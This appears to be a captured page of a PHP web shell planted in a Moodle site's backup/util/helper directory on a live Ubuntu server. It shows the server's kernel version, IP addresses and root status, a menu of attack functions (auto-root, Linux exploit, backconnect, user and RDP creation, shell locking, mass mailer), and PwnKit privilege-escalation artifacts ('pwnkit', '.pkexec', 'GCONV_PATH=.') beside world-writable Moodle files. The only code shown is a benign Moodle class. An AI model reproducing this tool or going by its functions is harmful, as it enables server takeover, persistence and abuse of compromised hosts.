Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
backup /
util /
helper /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
async_helper.class.php
13.07
KB
-rwxrwxrwx
backup_anonymizer_helper.class...
6.69
KB
-rwxrwxrwx
backup_array_iterator.class.ph...
1.86
KB
-rwxrwxrwx
backup_cron_helper.class.php
31.98
KB
-rwxrwxrwx
backup_file_manager.class.php
3.44
KB
-rwxrwxrwx
backup_general_helper.class.ph...
13.83
KB
-rwxrwxrwx
backup_helper.class.php
15.7
KB
-rwxrwxrwx
backup_null_iterator.class.php
1.59
KB
-rwxrwxrwx
convert_helper.class.php
14.09
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
restore_decode_content.class.p...
4.98
KB
-rwxrwxrwx
restore_decode_processor.class...
6.73
KB
-rwxrwxrwx
restore_decode_rule.class.php
8.35
KB
-rwxrwxrwx
restore_inforef_parser_process...
2.22
KB
-rwxrwxrwx
restore_log_rule.class.php
9.82
KB
-rwxrwxrwx
restore_logs_processor.class.p...
5.74
KB
-rwxrwxrwx
restore_moodlexml_parser_proce...
2.27
KB
-rwxrwxrwx
restore_prechecks_helper.class...
9.56
KB
-rwxrwxrwx
restore_questions_parser_proce...
3.5
KB
-rwxrwxrwx
restore_roles_parser_processor...
2.54
KB
-rwxrwxrwx
restore_structure_parser_proce...
4.83
KB
-rwxrwxrwx
restore_users_parser_processor...
3.24
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : restore_roles_parser_processor.class.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * @package moodlecore * @subpackage backup-helper * @copyright 2010 onwards Eloy Lafuente (stronk7) {@link http://stronk7.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require_once($CFG->dirroot.'/backup/util/xml/parser/processors/grouped_parser_processor.class.php'); /** * helper implementation of grouped_parser_processor that will * load all the contents of one roles.xml (roles description) file to the backup_ids table * storing the whole structure there for later processing. * Note: only "needed" roles are loaded (must have roleref record in backup_ids) * * TODO: Complete phpdocs */ class restore_roles_parser_processor extends grouped_parser_processor { protected $restoreid; public function __construct($restoreid) { $this->restoreid = $restoreid; parent::__construct(array()); // Set the paths we are interested on, returning all them grouped under user $this->add_path('/roles_definition/role'); } protected function dispatch_chunk($data) { // Received one role chunck, we are going to store it into backup_ids // table, with name = role $itemname = 'role'; $itemid = $data['tags']['id']; $info = $data['tags']; // Only load it if needed (exist same roleref itemid in table) if (restore_dbops::get_backup_ids_record($this->restoreid, 'roleref', $itemid)) { restore_dbops::set_backup_ids_record($this->restoreid, $itemname, $itemid, 0, null, $info); } } protected function notify_path_start($path) { // nothing to do } protected function notify_path_end($path) { // nothing to do } /** * Provide NULL decoding */ public function process_cdata($cdata) { if ($cdata === '$@NULL@$') { return null; } return $cdata; } }
Close